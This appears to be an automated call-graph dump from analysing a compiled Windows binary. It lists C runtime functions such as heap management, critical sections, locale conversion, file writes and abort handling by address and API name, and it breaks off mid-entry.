IsInExceptionSpec 8449->8450 8451 118c0d4 8450->8451 8471 118c20a GetModuleHandleW 8450->8471 8480 118af81 EnterCriticalSection 8451->8480 8457 118c0dc 8467 118c151 8457->8467 8470 118c17a 8457->8470 8481 118d6e4 8457->8481 8459 118c1c3 8463 118e2e9 _abort 5 API calls 8459->8463 8460 118c197 8491 118c1c9 8460->8491 8468 118c1c8 8463->8468 8465 118d2da _abort 5 API calls 8465->8470 8469 118c169 8467->8469 8484 118d2da 8467->8484 8468->8371 8469->8465 8488 118c1ba 8470->8488 8472 118c0c8 8471->8472 8472->8451 8473 118c24e GetModuleHandleExW 8472->8473 8474 118c278 GetProcAddress 8473->8474 8475 118c28d 8473->8475 8474->8475 8476 118c2aa 8475->8476 8477 118c2a1 FreeLibrary 8475->8477 8478 118dc5f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 8476->8478 8477->8476 8479 118c2b4 8478->8479 8479->8451 8480->8457 8499 118d41d 8481->8499 8485 118d309 8484->8485 8486 118dc5f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 8485->8486 8487 118d332 8486->8487 8487->8469 8521 118afc9 LeaveCriticalSection 8488->8521 8490 118c193 8490->8459 8490->8460 8522 118aaf2 8491->8522 8494 118c1f7 8497 118c24e _abort 8 API calls 8494->8497 8495 118c1d7 GetPEB 8495->8494 8496 118c1e7 GetCurrentProcess TerminateProcess 8495->8496 8496->8494 8498 118c1ff ExitProcess 8497->8498 8502 118d3cc 8499->8502 8501 118d441 8501->8467 8503 118d3d8 CallCatchBlock 8502->8503 8510 118af81 EnterCriticalSection 8503->8510 8505 118d3e6 8511 118d46d 8505->8511 8509 118d404 CallCatchBlock 8509->8501 8510->8505 8512 118d48d 8511->8512 8513 118d495 8511->8513 8514 118dc5f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 8512->8514 8513->8512 8516 118a6da _free 20 API calls 8513->8516 8515 118d3f3 8514->8515 8517 118d411 8515->8517 8516->8512 8520 118afc9 LeaveCriticalSection 8517->8520 8519 118d41b 8519->8509 8520->8519 8521->8490 8523 118ab17 8522->8523 8527 118ab0d 8522->8527 8524 118a714 _abort 5 API calls 8523->8524 8524->8527 8525 118dc5f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 8526 118ab75 8525->8526 8526->8494 8526->8495 8527->8525 8538 1190509 8528->8538 8530 11906b8 8531 11906cf TlsGetValue 8530->8531 8532 11906c4 8530->8532 8531->8532 8532->8410 8534 1190509 try_get_function 5 API calls 8533->8534 8535 11906f2 8534->8535 8536 119070c TlsSetValue 8535->8536 8537 1190701 8535->8537 8536->8537 8537->8413 8541 1190539 8538->8541 8543 119053d try_get_function 8538->8543 8539 119055d 8542 1190569 GetProcAddress 8539->8542 8539->8543 8541->8539 8541->8543 8544 11905a9 8541->8544 8542->8543 8543->8530 8545 11905d1 LoadLibraryExW 8544->8545 8550 11905c6 8544->8550 8546 11905ed GetLastError 8545->8546 8547 1190605 8545->8547 8546->8547 8548 11905f8 LoadLibraryExW 8546->8548 8549 119061c FreeLibrary 8547->8549 8547->8550 8548->8547 8549->8550 8550->8541 8551->8342 8555 118afc9 LeaveCriticalSection 8552->8555 8554 118b570 8554->8342 8555->8554 8557 1185e86 8556->8557 8558 1185e90 8556->8558 8557->8347 8557->8348 8558->8557 8559 1189c30 IsInExceptionSpec 47 API calls 8558->8559 8560 1185eb1 8559->8560 8564 1189d7f 8560->8564 8565 1185eca 8564->8565 8566 1189d92 8564->8566 8568 1189dac 8565->8568 8566->8565 8572 118ae79 8566->8572 8569 1189dbf 8568->8569 8571 1189dd4 8568->8571 8570 118b4d8 __fassign 47 API calls 8569->8570 8569->8571 8570->8571 8571->8557 8573 118ae85 CallCatchBlock 8572->8573 8574 1189c30 IsInExceptionSpec 47 API calls 8573->8574 8575 118ae8e 8574->8575 8576 118aedc CallCatchBlock 8575->8576 8584 118af81 EnterCriticalSection 8575->8584 8576->8565 8578 118aeac 8585 118aef0 8578->8585 8583 118a63a _abort 47 API calls 8583->8576 8584->8578 8586 118aefe __fassign 8585->8586 8588 118aec0 8585->8588 8587 118ac2c __fassign 20 API calls 8586->8587 8586->8588 8587->8588 8589 118aedf 8588->8589 8592 118afc9 LeaveCriticalSection 8589->8592 8591 118aed3 8591->8576 8591->8583 8592->8591 8594 118b309 8593->8594 8599 118b25f 8593->8599 8596 118dc5f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 8594->8596 8598 118b3b5 8596->8598 8598->8358 8603 118a4fd 8599->8603 8602 118caa6 53 API calls 8602->8594 8604 1185e73 __fassign 47 API calls 8603->8604 8605 118a51d MultiByteToWideChar 8604->8605 8607 118a55b 8605->8607 8613 118a5f3 8605->8613 8609 118bd19 __onexit 21 API calls 8607->8609 8614 118a57c __alloca_probe_16 ___scrt_get_show_window_mode 8607->8614 8608 118dc5f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 8610 118a616 8608->8610 8609->8614 8617 118caa6 8610->8617 8611 118a5ed 8622 118a61a 8611->8622 8613->8608 8614->8611 8615 118a5c1 MultiByteToWideChar 8614->8615 8615->8611 8616 118a5dd GetStringTypeW 8615->8616 8616->8611 8618 1185e73 __fassign 47 API calls 8617->8618 8619 118cab9 8618->8619 8626 118c889 8619->8626 8623 118a626 8622->8623 8625 118a637 8622->8625 8624 118a6da _free 20 API calls 8623->8624 8623->8625 8624->8625 8625->8613 8627 118c8a4 8626->8627 8628 118c8ca MultiByteToWideChar 8627->8628 8629 118ca7e 8628->8629 8630 118c8f4 8628->8630 8631 118dc5f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 8629->8631 8633 118bd19 __onexit 21 API calls 8630->8633 8636 118c915 __alloca_probe_16 8630->8636 8632 118b2e1 8631->8632 8632->8602 8633->8636 8634 118c95e MultiByteToWideChar 8635 118c9ca 8634->8635 8637 118c977 8634->8637 8639 118a61a __freea 20 API calls 8635->8639 8636->8634 8636->8635 8653 118a9e8 8637->8653 8639->8629 8641 118c9d9 8645 118bd19 __onexit 21 API calls 8641->8645 8648 118c9fa __alloca_probe_16 8641->8648 8642 118c9a1 8642->8635 8644 118a9e8 12 API calls 8642->8644 8643 118ca6f 8647 118a61a __freea 20 API calls 8643->8647 8644->8635 8645->8648 8646 118a9e8 12 API calls 8649 118ca4e 8646->8649 8647->8635 8648->8643 8648->8646 8649->8643 8650 118ca5d WideCharToMultiByte 8649->8650 8650->8643 8651 118ca9d 8650->8651 8652 118a61a __freea 20 API calls 8651->8652 8652->8635 8654 118a714 _abort 5 API calls 8653->8654 8655 118aa0f 8654->8655 8656 118aa18 LCMapStringEx 8655->8656 8657 118aa3f 8655->8657 8661 118aa5f 8656->8661 8664 118aa70 8657->8664 8662 118dc5f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 8661->8662 8663 118aa6a 8662->8663 8663->8635 8663->8641 8663->8642 8665 118a714 _abort 5 API calls 8664->8665 8666 118aa97 8665->8666 8667 118dc5f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 8666->8667 8668 118aa58 LCMapStringW 8667->8668 8668->8661 8670 118afec CallCatchBlock 8669->8670 8677 118af81 EnterCriticalSection 8670->8677 8672 118aff6 8678 118b04b 8672->8678 8676 118b00f CallCatchBlock 8676->8363 8677->8672 8690 118b76b 8678->8690 8680 118b099 8681 118b76b 26 API calls 8680->8681 8682 118b0b5 8681->8682 8683 118b76b 26 API calls 8682->8683 8684 118b0d3 8683->8684 8685 118b003 8684->8685 8686 118a6da _free 20 API calls 8684->8686 8687 118b017 8685->8687 8686->8685 8704 118afc9 LeaveCriticalSection 8687->8704 8689 118b021 8689->8676 8691 118b77c 8690->8691 8694 118b778 8690->8694 8692 118b783 8691->8692 8696 118b796 ___scrt_get_show_window_mode 8691->8696 8693 1189826 _free 20 API calls 8692->8693 8695 118b788 8693->8695 8694->8680 8697 118976a _abort 26 API calls 8695->8697 8696->8694 8698 118b7c4 8696->8698 8700 118b7cd 8696->8700 8697->8694 8699 1189826 _free 20 API calls 8698->8699 8701 118b7c9 8699->8701 8700->8694 8702 1189826 _free 20 API calls 8700->8702 8703 118976a _abort 26 API calls 8701->8703 8702->8701 8703->8694 8704->8689 9524 118da2f 9525 118da37 pre_c_initialization 9524->9525 9542 119154f 9525->9542 9527 118da42 pre_c_initialization 9549 118e3ac 9527->9549 9529 118dacb 9530 118dd8f ___scrt_fastfail 4 API calls 9529->9530 9532 118dad2 ___scrt_initialize_default_local_stdio_options 9530->9532 9531 118da57 __RTC_Initialize 9531->9529 9554 118e54d 9531->9554 9534 118da70 pre_c_initialization 9534->9529 9535 118da81 9534->9535 9557 118e60b InitializeSListHead 9535->9557 9537 118da86 pre_c_initialization __except_handler4 9558 118e617 9537->9558 9539 118daa9 pre_c_initialization 9564 1189e41 9539->9564 9541 118dab4 pre_c_initialization 9543 119155e 9542->9543 9544 1191581 9542->9544 9543->9544 9545 1189826 _free 20 API calls 9543->9545 9544->9527 9546 1191571 9545->9546 9547 118976a _abort 26 API calls 9546->9547 9548 119157c 9547->9548 9548->9527 9550 118e3ba 9549->9550 9551 118e3bf ___scrt_initialize_onexit_tables 9549->9551 9550->9551 9552 118dd8f ___scrt_fastfail 4 API calls 9550->9552 9551->9531 9553 118e442 9552->9553 9571 118e512 9554->9571 9557->9537 9609 11916db 9558->9609 9560 118e628 9561 118e62f 9560->9561 9562 118dd8f ___scrt_fastfail 4 API calls 9560->9562 9561->9539 9563 118e637 9562->9563 9565 1189c30 IsInExceptionSpec 47 API calls 9564->9565 9567 1189e4c 9565->9567 9566 1189e84 9566->9541 9567->9566 9568 1189826 _free 20 API calls 9567->9568 9569 1189e79 9568->9569 9570 118976a _abort 26 API calls 9569->9570 9570->9566 9572 118e52f 9571->9572 9573 118e536 9571->9573 9577 118d6ce 9572->9577 9580 118d73e 9573->9580 9576 118e534 9576->9534 9578 118d73e __onexit 29 API calls 9577->9578 9579 118d6e0 9578->9579 9579->9576 9583 118d445 9580->9583 9586 118d37b 9583->9586 9585 118d469 9585->9576 9587 118d387 CallCatchBlock 9586->9587 9594 118af81 EnterCriticalSection 9587->9594 9589 118d395 9595 118d58d 9589->9595 9591 118d3a2 9605 118d3c0 9591->9605 9593 118d3b3 CallCatchBlock 9593->9585 9594->9589 9596 118d5a3 try_get_function 9595->9596 9597 118d5ab 9595->9597 9596->9591 9597->9596 9598 118d91b __onexit 29 API calls 9597->9598 9604 118d604 9597->9604 9600 118d5fa 9598->9600 9599 118d91b __onexit 29 API calls 9601 118d61a 9599->9601 9602 118a6da _free 20 API calls 9600->9602 9603 118a6da _free 20 API calls 9601->9603 9602->9604 9603->9596 9604->9596 9604->9599 9608 118afc9 LeaveCriticalSection 9605->9608 9607 118d3ca 9607->9593 9608->9607 9610 11916f9 pre_c_initialization 9609->9610 9612 1191719 pre_c_initialization 9609->9612 9611 1189826 _free 20 API calls 9610->9611 9613 119170f 9611->9613 9612->9560 9614 118976a _abort 26 API calls 9613->9614 9614->9612 8013 11912db 8022 1191d19 GetEnvironmentStringsW 8013->8022 8017 118a6da _free 20 API calls 8018 1191328 8017->8018 8019 11912fe 8046 118a6da 8019->8046 8021 11912f3 8021->8017 8023 11912ed 8022->8023 8024 1191d2d 8022->8024 8023->8021 8029 119132e 8023->8029 8052 118bd19 8024->8052 8026 1191d41 8027 118a6da _free 20 API calls 8026->8027 8028 1191d5b FreeEnvironmentStringsW 8027->8028 8028->8023 8030 119134c 8029->8030 8031 118a67d _abort 20 API calls 8030->8031 8041 1191386 8031->8041 8032 11913f7 8033 118a6da _free 20 API calls 8032->8033 8034 1191411 8033->8034 8034->8019 8035 118a67d _abort 20 API calls 8035->8041 8036 11913f9 8262 1191428 8036->8262 8040 118a6da _free 20 API calls 8040->8032 8041->8032 8041->8035 8041->8036 8042 119141b 8041->8042 8044 118a6da _free 20 API calls 8041->8044 8253 118bd67 8041->8253 8268 118977a IsProcessorFeaturePresent 8042->8268 8044->8041 8045 1191427 8047 118a6e5 HeapFree 8046->8047 8051 118a70e _free 8046->8051 8048 118a6fa 8047->8048 8047->8051 8049 1189826 _free 18 API calls 8048->8049 8050 118a700 GetLastError 8049->8050 8050->8051 8051->8021 8053 118bd57 8052->8053 8057 118bd27 _abort 8052->8057 8064 1189826 8053->8064 8054 118bd42 RtlAllocateHeap 8056 118bd55 8054->8056 8054->8057 8056->8026 8057->8053 8057->8054 8059 118c6ac 8057->8059 8067 118c6f0 8059->8067 8062 118c6ec 8062->8057 8063 118c6c2 8073 118dc5f 8063->8073 8086 1189cb4 GetLastError 8064->8086 8068 118c6fc CallCatchBlock 8067->8068 8080 118af81 EnterCriticalSection 8068->8080 8070 118c707 8081 118c739 8070->8081 8072 118c72e CallCatchBlock 8072->8063 8074 118dc68 8073->8074 8075 118dc6a IsProcessorFeaturePresent 8073->8075 8074->8062 8077 118dfd7 8075->8077 8085 118df9b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8077->8085 8079 118e0ba 8079->8062 8080->8070 8084 118afc9 LeaveCriticalSection 8081->8084 8083 118c740 8083->8072 8084->8083 8085->8079 8087 1189cd3 8086->8087 8088 1189ccd 8086->8088 8092 1189d2a SetLastError 8087->8092 8112 118a67d 8087->8112 8105 118a8d7 8088->8105 8095 118982b 8092->8095 8093 1189ced 8096 118a6da _free 17 API calls 8093->8096 8095->8056 8098 1189cf3 8096->8098 8100 1189d21 SetLastError 8098->8100 8099 1189d09 8126 1189aa2 8099->8126 8100->8095 8103 118a6da _free 17 API calls 8104 1189d1a 8103->8104 8104->8092 8104->8100 8131 118a714 8105->8131 8108 118a916 TlsGetValue 8109 118a90a 8108->8109 8110 118dc5f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 8109->8110 8111 118a927 8110->8111 8111->8087 8113 118a68a _abort 8112->8113 8114 118a6ca 8113->8114 8115 118a6b5 RtlAllocateHeap 8113->8115 8118 118c6ac _abort 7 API calls 8113->8118 8116 1189826 _free 19 API calls 8114->8116 8115->8113 8117 1189ce5 8115->8117 8116->8117 8117->8093 8119 118a92d 8117->8119 8118->8113 8120 118a714 _abort 5 API calls 8119->8120 8121 118a954 8120->8121 8122 118a96f TlsSetValue 8121->8122 8123 118a963 8121->8123 8122->8123 8124 118dc5f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 8123->8124 8125 1189d02 8124->8125 8125->8093 8125->8099 8145 1189a7a 8126->8145 8132 118a740 8131->8132 8133 118a744 8131->8133 8132->8133 8137 118a764 8132->8137 8138 118a7b0 8132->8138 8133->8108 8133->8109 8135 118a770 GetProcAddress 8136 118a780 try_get_function 8135->8136 8136->8133 8137->8133 8137->8135 8139 118a7d1 LoadLibraryExW 8138->8139 8144 118a7c6 8138->8144 8140 118a7ee GetLastError 8139->8140 8141 118a806 8139->8141 8140->8141 8142 118a7f9 LoadLibraryExW 8140->8142 8143 118a81d FreeLibrary 8141->8143 8141->8144 8142->8141 8143->8144 8144->8132 8151 11899ba 8145->8151 8147 1189a9e 8148 1189a2a 8147->8148 8162 11898be 8148->8162 8150 1189a4e 8150->8103 8152 11899c6 CallCatchBlock 8151->8152 8157 118af81 EnterCriticalSection 8152->8157 8154 11899d0 8158 11899f6 8154->8158 8156 11899ee CallCatchBlock 8156->8147 8157->8154 8161 118afc9 LeaveCriticalSection 8158->8161 8160 1189a00 8160->8156 8161->8160 8163 11898ca CallCatchBlock 8162->8163 8170 118af81 EnterCriticalSection 8163->8170 8165 11898d4 8171 1189be5 8165->8171 8167 11898ec 8175 1189902 8167->8175 8169 11898fa CallCatchBlock 8169->8150 8170->8165 8172 1189bf4 __fassign 8171->8172 8173 1189c1b __fassign 8171->8173 8172->8173 8178 118ac2c 8172->8178 8173->8167 8252 118afc9 LeaveCriticalSection 8175->8252 8177 118990c 8177->8169 8180 118acac 8178->8180 8181 118ac42 8178->8181 8182 118a6da _free 20 API calls 8180->8182 8205 118acfa 8180->8205 8181->8180 8186 118a6da _free 20 API calls 8181->8186 8188 118ac75 8181->8188 8183 118acce 8182->8183 8184 118a6da _free 20 API calls 8183->8184 8189 118ace1 8184->8189 8185 118a6da _free 20 API calls 8190 118aca1 8185->8190 8192 118ac6a 8186->8192 8187 118ad08 8191 118ad68 8187->8191 8198 118a6da 20 API calls _free 8187->8198 8193 118a6da _free 20 API calls 8188->8193 8204 118ac97 8188->8204 8194 118a6da _free 20 API calls 8189->8194 8195 118a6da _free 20 API calls 8190->8195 8196 118a6da _free 20 API calls 8191->8196 8206 118ba92 8192->8206 8199 118ac8c 8193->8199 8200 118acef 8194->8200 8195->8180 8201 118ad6e 8196->8201 8198->8187 8234 118bb90 8199->8234 8203 118a6da _free 20 API calls 8200->8203 8201->8173 8203->8205 8204->8185 8246 118ad9f 8205->8246 8207 118baa3 8206->8207 8233 118bb8c 8206->8233 8208 118bab4 8207->8208 8209 118a6da _free 20 API calls 8207->8209 8210 118bac6 8208->8210 8211 118a6da _free 20 API calls 8208->8211 8209->8208 8212 118bad8 8210->8212 8213 118a6da _free 20 API calls 8210->8213 8211->8210 8214 118baea 8212->8214 8215 118a6da _free 20 API calls 8212->8215 8213->8212 8216 118a6da _free 20 API calls 8214->8216 8217 118bafc 8214->8217 8215->8214 8216->8217 8218 118bb0e 8217->8218 8219 118a6da _free 20 API calls 8217->8219 8220 118bb20 8218->8220 8221 118a6da _free 20 API calls 8218->8221 8219->8218 8222 118bb32 8220->8222 8223 118a6da _free 20 API calls 8220->8223 8221->8220 8224 118bb44 8222->8224 8225 118a6da _free 20 API calls 8222->8225 8223->8222 8226 118bb56 8224->8226 8227 118a6da _free 20 API calls 8224->8227 8225->8224 8228 118bb68 8226->8228 8229 118a6da _free 20 API calls 8226->8229 8227->8226 8230 118bb7a 8228->8230 8231 118a6da _free 20 API calls 8228->8231 8229->8228 8232 118a6da _free 20 API calls 8230->8232 8230->8233 8231->8230 8232->8233 8233->8188 8235 118bb9d 8234->8235 8236 118bbf5 8234->8236 8237 118bbad 8235->8237 8238 118a6da _free 20 API calls 8235->8238 8236->8204 8239 118bbbf 8237->8239 8240 118a6da _free 20 API calls 8237->8240 8238->8237 8241 118bbd1 8239->8241 8242 118a6da _free 20 API calls 8239->8242 8240->8239 8243 118bbe3 8241->8243 8244 118a6da _free 20 API calls 8241->8244 8242->8241 8243->8236 8245 118a6da _free 20 API calls 8243->8245 8244->8243 8245->8236 8247 118adac 8246->8247 8251 118adca 8246->8251 8248 118bc35 __fassign 20 API calls 8247->8248 8247->8251 8249 118adc4 8248->8249 8250 118a6da _free 20 API calls 8249->8250 8250->8251 8251->8187 8252->8177 8254 118bd74 8253->8254 8255 118bd82 8253->8255 8254->8255 8260 118bd9b 8254->8260 8256 1189826 _free 20 API calls 8255->8256 8257 118bd8c 8256->8257 8272 118976a 8257->8272 8259 118bd96 8259->8041 8260->8259 8261 1189826 _free 20 API calls 8260->8261 8261->8257 8263 1191435 8262->8263 8264 11913ff 8262->8264 8265 119144c 8263->8265 8266 118a6da _free 20 API calls 8263->8266 8264->8040 8267 118a6da _free 20 API calls 8265->8267 8266->8263 8267->8264 8269 1189785 8268->8269 8286 11895a0 8269->8286 8275 11896ef 8272->8275 8274 1189776 8274->8259 8276 1189cb4 _abort 20 API calls 8275->8276 8277 1189705 8276->8277 8278 1189713 8277->8278 8279 1189764 8277->8279 8283 118dc5f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 8278->8283 8280 118977a _abort 11 API calls 8279->8280 8281 1189769 8280->8281 8282 11896ef _abort 26 API calls 8281->8282 8284 1189776 8282->8284 8285 118973a 8283->8285 8284->8274 8285->8274 8287 11895bc _abort ___scrt_get_show_window_mode 8286->8287 8288 11895e8 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8287->8288 8291 11896b9 _abort 8288->8291 8289 118dc5f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 8290 11896d7 GetCurrentProcess TerminateProcess 8289->8290 8290->8045 8291->8289 8705 118dadb 8710 118dedd SetUnhandledExceptionFilter 8705->8710 8707 118dae0 pre_c_initialization 8711 118c748 8707->8711 8709 118daeb 8710->8707 8712 118c76e 8711->8712 8713 118c754 8711->8713 8712->8709 8713->8712 8714 1189826 _free 20 API calls 8713->8714 8715 118c75e 8714->8715 8716 118976a _abort 26 API calls 8715->8716 8717 118c769 8716->8717 8717->8709 10077 11928f8 10087 1192f33 10077->10087 10081 1192905 10100 11930b4 10081->10100 10084 119292f 10085 118a6da _free 20 API calls 10084->10085 10086 119293a 10085->10086 10104 1192f3c 10087->10104 10089 1192900 10090 1193014 10089->10090 10091 1193020 CallCatchBlock 10090->10091 10124 118af81 EnterCriticalSection 10091->10124 10093 1193096 10138 11930ab 10093->10138 10095 119302b 10095->10093 10097 119306a DeleteCriticalSection 10095->10097 10125 1193e2c 10095->10125 10096 11930a2 CallCatchBlock 10096->10081 10098 118a6da _free 20 API calls 10097->10098 10098->10095 10101 11930ca 10100->10101 10102 1192914 DeleteCriticalSection 10100->10102 10101->10102 10103 118a6da _free 20 API calls 10101->10103 10102->10081 10102->10084 10103->10102 10105 1192f48 CallCatchBlock 10104->10105 10114 118af81 EnterCriticalSection 10105->10114 10107 1192feb 10119 119300b 10107->10119 10110 1192ff7 CallCatchBlock 10110->10089 10112 1192eec 75 API calls 10113 1192f57 10112->10113 10113->10107 10113->10112 10115 1192944 EnterCriticalSection 10113->10115 10116 1192fe1 10113->10116 10114->10113 10115->10113 10122 1192958 LeaveCriticalSection 10116->10122 10118 1192fe9 10118->10113 10123 118afc9 LeaveCriticalSection 10119->10123 10121 1193012 10121->10110 10122->10118 10123->10121 10124->10095 10126 1193e38 CallCatchBlock 10125->10126 10127 1193e49 10126->10127 10128 1193e5e 10126->10128 10129 1189826 _free 20 API calls 10127->10129 10137 1193e59 CallCatchBlock 10128->10137 10141 1192944 EnterCriticalSection 10128->10141 10131 1193e4e 10129->10131 10133 118976a _abort 26 API calls 10131->10133 10132 1193e7a 10142 1193db6 10132->10142 10133->10137 10135 1193e85 10158 1193ea2 10135->10158 10137->10095 10406 118afc9 LeaveCriticalSection 10138->10406 10140 11930b2 10140->10096 10141->10132 10143 1193dd8 10142->10143 10144 1193dc3 10142->10144 10150 1193dd3 10143->10150 10161 1192e86 10143->10161 10145 1189826 _free 20 API calls 10144->10145 10146 1193dc8 10145->10146 10149 118976a _abort 26 API calls 10146->10149 10149->10150 10150->10135 10151 11930b4 20 API calls 10152 1193df4 10151->10152 10167 119280a 10152->10167 10154 1193dfa 10174 11942ca 10154->10174 10157 118a6da _free 20 API calls 10157->10150 10405 1192958 LeaveCriticalSection 10158->10405 10160 1193eaa 10160->10137 10162 1192e9e 10161->10162 10163 1192e9a 10161->10163 10162->10163 10164 119280a 26 API calls 10162->10164 10163->10151 10165 1192ebe 10164->10165 10189 11937b1 10165->10189 10168 119282b 10167->10168 10169 1192816 10167->10169 10168->10154 10170 1189826 _free 20 API calls 10169->10170 10171 119281b 10170->10171 10172 118976a _abort 26 API calls 10171->10172 10173 1192826 10172->10173 10173->10154 10175 11942d9 10174->10175 10176 11942ee 10174->10176 10177 1189813 __dosmaperr 20 API calls 10175->10177 10178 1194329 10176->10178 10183 1194315 10176->10183 10180 11942de 10177->10180 10179 1189813 __dosmaperr 20 API calls 10178->10179 10181 119432e 10179->10181 10182 1189826 _free 20 API calls 10180->10182 10184 1189826 _free 20 API calls 10181->10184 10187 1193e00 10182->10187 10362 11942a2 10183->10362 10186 1194336 10184->10186 10188 118976a _abort 26 API calls 10186->10188 10187->10150 10187->10157 10188->10187 10190 11937bd CallCatchBlock 10189->10190 10191 11937dd 10190->10191 10192 11937c5 10190->10192 10194 119387b 10191->10194 10199 1193812 10191->10199 10214 1189813 10192->10214 10196 1189813 __dosmaperr 20 API calls 10194->10196 10198 1193880 10196->10198 10197 1189826 _free 20 API calls 10207 11937d2 CallCatchBlock 10197->10207 10200 1189826 _free 20 API calls 10198->10200 10217 1191eb0 EnterCriticalSection 10199->10217 10202 1193888 10200->10202 10204 118976a _abort 26 API calls 10202->10204 10203 1193818 10205 1193849 10203->10205 10206 1193834 10203->10206 10204->10207 10218 119389c 10205->10218 10208 1189826 _free 20 API calls 10206->10208 10207->10163 10210 1193839 10208->10210 10212 1189813 __dosmaperr 20 API calls 10210->10212 10211 1193844 10269 1193873 10211->10269 10212->10211 10215 1189cb4 _abort 20 API calls 10214->10215 10216 1189818 10215->10216 10216->10197 10217->10203 10219 11938ca 10218->10219 10264 11938c3 10218->10264 10220 11938ed 10219->10220 10221 11938ce 10219->10221 10225 119393e 10220->10225 10226 1193921 10220->10226 10222 1189813 __dosmaperr 20 API calls 10221->10222 10224 11938d3 10222->10224 10223 118dc5f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 10227 1193aa4 10223->10227 10228 1189826 _free 20 API calls 10224->10228 10229 1193954 10225->10229 10272 1193d9b 10225->10272 10230 1189813 __dosmaperr 20 API calls 10226->10230 10227->10211 10231 11938da 10228->10231 10275 1193441 10229->10275 10234 1193926 10230->10234 10235 118976a _abort 26 API calls 10231->10235 10237 1189826 _free 20 API calls 10234->10237 10235->10264 10240 119392e 10237->10240 10238 119399b 10241 11939af 10238->10241 10242 11939f5 WriteFile 10238->10242 10239 1193962 10243 1193988 10239->10243 10244 1193966 10239->10244 10245 118976a _abort 26 API calls 10240->10245 10246 11939e5 10241->10246 10247 11939b7 10241->10247 10248 1193a18 GetLastError 10242->10248 10254 119397e 10242->10254 10287 1193221 GetConsoleCP 10243->10287 10253 1193a5c 10244->10253 10282 11933d4 10244->10282 10245->10264 10313 11934b7 10246->10313 10250 11939d5 10247->10250 10256 11939bc 10247->10256 10248->10254 10305 1193684 10250->10305 10255 1189826 _free 20 API calls 10253->10255 10253->10264 10254->10253 10259 1193a38 10254->10259 10254->10264 10258 1193a81 10255->10258 10256->10253 10298 1193596 10256->10298 10261 1189813 __dosmaperr 20 API calls 10258->10261 10262 1193a3f 10259->10262 10263 1193a53 10259->10263 10261->10264 10265 1189826 _free 20 API calls 10262->10265 10320 11897f0 10263->10320 10264->10223 10267 1193a44 10265->10267 10268 1189813 __dosmaperr 20 API calls 10267->10268 10268->10264 10361 1191ed3 LeaveCriticalSection 10269->10361 10271 1193879 10271->10207 10325 1193d1d 10272->10325 10347 1192e30 10275->10347 10277 1193451 10278 1193456 10277->10278 10279 1189c30 IsInExceptionSpec 47 API calls 10277->10279 10278->10238 10278->10239 10280 1193479 10279->10280 10280->10278 10281 1193497 GetConsoleMode 10280->10281 10281->10278 10285 119342e 10282->10285 10286 11933f9 10282->10286 10283 1193f11 WriteConsoleW CreateFileW 10283->10286 10284 1193430 GetLastError 10284->10285 10285->10254 10286->10283 10286->10284 10286->10285 10291 1193284 10287->10291 10297 1193396 10287->10297 10288 118dc5f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 10290 11933d0 10288->10290 10290->10254 10292 119330a WideCharToMultiByte 10291->10292 10294 11927f0 49 API calls __fassign 10291->10294 10296 1193361 WriteFile 10291->10296 10291->10297 10356 1189839 10291->10356 10293 1193330 WriteFile 10292->10293 10292->10297 10293->10291 10295 11933b9 GetLastError 10293->10295 10294->10291 10295->10297 10296->10291 10296->10295 10297->10288 10302 11935a5 10298->10302 10299 1193667 10301 118dc5f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 10299->10301 10300 1193623 WriteFile 10300->10302 10303 1193669 GetLastError 10300->10303 10304 1193680 10301->10304 10302->10299 10302->10300 10303->10299 10304->10254 10309 1193693 10305->10309 10306 119379e 10307 118dc5f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 10306->10307 10310 11937ad 10307->10310 10308 1193715 WideCharToMultiByte 10311 119374a WriteFile 10308->10311 10312 1193796 GetLastError 10308->10312 10309->10306 10309->10308 10309->10311 10310->10254 10311->10309 10311->10312 10312->10306 10315 11934c6 10313->10315 10314 1193579 10317 118dc5f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 10314->10317 10315->10314 10316 1193538 WriteFile 10315->10316 10316->10315 10318 119357b GetLastError 10316->10318 10319 1193592 10317->10319 10318->10314 10319->10254 10321 1189813 __dosmaperr 20 API calls 10320->10321 10322 11897fb _free 10321->10322 10323 1189826 _free 20 API calls 10322->10323 10324 118980e 10323->10324 10324->10264 10334 1191f87 10325->10334 10327 1193d2f 10328 1193d48 SetFilePointerEx 10327->10328 10329 1193d37 10327->10329 10331 1193d60 GetLastError 10328->10331 10333 1193d3c 10328->10333 10330 1189826 _free 20 API calls 10329->10330 10330->10333 10332 11897f0 __dosmaperr 20 API calls 10331->10332 10332->10333 10333->10229 10335 1191fa9 10334->10335 10336 1191f94 10334->10336 10338 1189813 __dosmaperr 20 API calls 10335->10338 10340 1191fce 10335->10340 10337 1189813 __dosmaperr 20 API calls 10336->10337 10339 1191f99 10337->10339 10341 1191fd9 10338->10341 10342 1189826 _free 20 API calls 10339->10342 10340->10327 10343 1189826 _free 20 API calls 10341->10343 10344 1191fa1 10342->10344 10345 1191fe1 10343->10345 10344->10327 10346 118976a _abort 26 API calls 10345->10346 10346->10344 10348 1192e3d 10347->10348 10349 1192e4a 10347->10349 10350 1189826 _free 20 API calls 10348->10350 10351 1192e56 10349->10351 10352 1189826 _free 20 API calls 10349->10352 10353 1192e42 10350->10353 10351->10277 10354 